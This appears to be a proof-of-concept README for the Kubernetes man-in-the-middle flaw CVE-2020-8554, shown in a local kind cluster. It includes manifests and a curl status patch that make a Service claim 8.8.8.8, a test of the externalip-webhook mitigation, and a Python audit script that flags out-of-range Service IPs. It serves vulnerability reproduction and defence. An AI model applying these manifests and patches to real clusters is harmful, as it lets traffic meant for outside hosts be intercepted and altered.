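Related vulnerability
Title: Kubernetes security vulnerability (CVE-2020-8554)
Description: Kubernetes is an open-source Docker container cluster management system from the US-based Linux Foundation. It provides resource scheduling, deployment, service discovery, and scale-up/scale-down for containerized applications. Kubernetes contains a security vulnerability: an attacker can use a LoadBalancer ExternalIP on Kubernetes to act as a man-in-the-middle and read or write data in a session.
Introduction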
# Create Kubernetes cluster
```bash
kind create cluster --config ./kind.yaml
```
cert-manager must be installed in the cluster:
https://cert-manager.io/docs/installation/kubernetes/
# Test vulnerability
```bash
# Namespace and a simple echo server to act as the Service backend
kubectl apply -f - <<'EOF'
apiVersion: v1
kind: Namespace
metadata:
  name: kubeproxy-mitm
---
apiVersion: apps/v1
kind: Deployment
metadata:
  name: echoserver
  namespace: kubeproxy-mitm
spec:
  replicas: 1
  selector:
    matchLabels:
      app: echoserver
  template:
    metadata:
      labels:
        app: echoserver
    spec:
      containers:
      - image: gcr.io/google_containers/echoserver:1.10
        name: echoserver
        ports:
        - name: http
          containerPort: 8080
        - name: https
          containerPort: 8443
EOF
# Service that claims 8.8.8.8 as an external IP
kubectl apply -f - <<'EOF'
apiVersion: v1
kind: Service
metadata:
  name: mitm-lb
  namespace: kubeproxy-mitm
spec:
  ports:
  - name: http
    port: 80
    targetPort: 8080
  - name: https
    port: 443
    targetPort: 8443
  selector:
    app: echoserver
  externalIPs:
  - 8.8.8.8
  type: LoadBalancer
EOF
# Run the API proxy in the background so the following commands can use it
kubectl proxy --port=8080 &
# Patch the Service status so the load balancer ingress IP is also 8.8.8.8
curl -k -v -XPATCH -H "Accept: application/json" -H "Content-Type: application/merge-patch+json" 'http://127.0.0.1:8080/api/v1/namespaces/kubeproxy-mitm/services/mitm-lb/status' -d '{"status":{"loadBalancer":{"ingress":[{"ip":"8.8.8.8"}]}}}'
# check external IP
kubectl get svc -n kubeproxy-mitm
```
# Test the vulnerability
Deploy the admission webhook from https://github.com/kubernetes-sigs/externalip-webhook, then delete and re-create the Service and repeat the status patch:
```bash
# Install the webhook, then remove the Service created earlier
kubectl apply -f ./externalip-webhook.yaml
kubectl delete svc -n kubeproxy-mitm mitm-lb
# Re-create the same Service with the webhook in place
kubectl apply -f - <<'EOF'
apiVersion: v1
kind: Service
metadata:
  name: mitm-lb
  namespace: kubeproxy-mitm
spec:
  ports:
  - name: http
    port: 80
    targetPort: 8080
  - name: https
    port: 443
    targetPort: 8443
  selector:
    app: echoserver
  externalIPs:
  - 8.8.8.8
  type: LoadBalancer
EOF
# Repeat the status patch (requires the kubectl proxy from the previous section to still be running)
curl -k -v -XPATCH -H "Accept: application/json" -H "Content-Type: application/merge-patch+json" 'http://127.0.0.1:8080/api/v1/namespaces/kubeproxy-mitm/services/mitm-lb/status' -d '{"status":{"loadBalancer":{"ingress":[{"ip":"8.8.8.8"}]}}}'
```
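To find Services like `mitm-lb` in an existing cluster, the following audit flags any Service whose `spec.externalIPs` or `status.loadBalancer.ingress` address falls outside an allow-list. It is an added example, not part of the original README or of externalip-webhook; `ALLOWED_CIDRS`, the sample JSON and the file name `audit.py` are constructed assumptions.

```python
import ipaddress
import json
import sys

# Assumption: the only range this cluster may legitimately expose (TEST-NET-1 here).
ALLOWED_CIDRS = ["192.0.2.0/24"]

# Constructed sample in the shape of `kubectl get svc -A -o json`.
SAMPLE = {"items": [
    {"metadata": {"namespace": "kubeproxy-mitm", "name": "mitm-lb"},
     "spec": {"type": "LoadBalancer", "externalIPs": ["8.8.8.8"]},
     "status": {"loadBalancer": {"ingress": [{"ip": "8.8.8.8"}]}}},
    {"metadata": {"namespace": "default", "name": "web"},
     "spec": {"type": "LoadBalancer"},
     "status": {"loadBalancer": {"ingress": [{"ip": "192.0.2.10"}]}}},
    {"metadata": {"namespace": "default", "name": "internal"},
     "spec": {"type": "ClusterIP"}, "status": {"loadBalancer": {}}},
]}


def audit_services(service_list, allowed_cidrs=ALLOWED_CIDRS):
    """Return (namespace, name, field, ip) for each Service IP outside allowed_cidrs."""
    nets = [ipaddress.ip_network(c) for c in allowed_cidrs]
    findings = []
    for svc in service_list.get("items", []):
        meta = svc.get("metadata", {})
        spec, status = svc.get("spec", {}), svc.get("status", {})
        # Both fields are checked, matching the two steps the README performs.
        candidates = [("spec.externalIPs", ip) for ip in spec.get("externalIPs") or []]
        for entry in status.get("loadBalancer", {}).get("ingress") or []:
            if entry.get("ip"):  # hostname-only ingress entries are skipped
                candidates.append(("status.loadBalancer.ingress", entry["ip"]))
        for field, ip in candidates:
            try:
                allowed = any(ipaddress.ip_address(ip) in net for net in nets)
            except ValueError:
                allowed = False  # unparseable address: report it
            if not allowed:
                findings.append((meta.get("namespace"), meta.get("name"), field, ip))
    return findings


if __name__ == "__main__":
    # Pass "-" to read live output: kubectl get svc -A -o json | python3 audit.py -
    data = json.load(sys.stdin) if sys.argv[1:] == ["-"] else SAMPLE
    for ns, name, field, ip in audit_services(data):
        print(f"{ns}/{name}: {field} contains {ip}, outside {ALLOWED_CIDRS}")
```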
File snapshot
[4.0K] /data/pocs/5ba655ff33ebdde1d64280c927eb44f8cdfc4b0b
├── [4.1K] externalip-webhook.yaml
├── [ 150] kind.yaml
├── [2.1K] README.md
└── [ 287] svc.yaml
0 directories, 4 files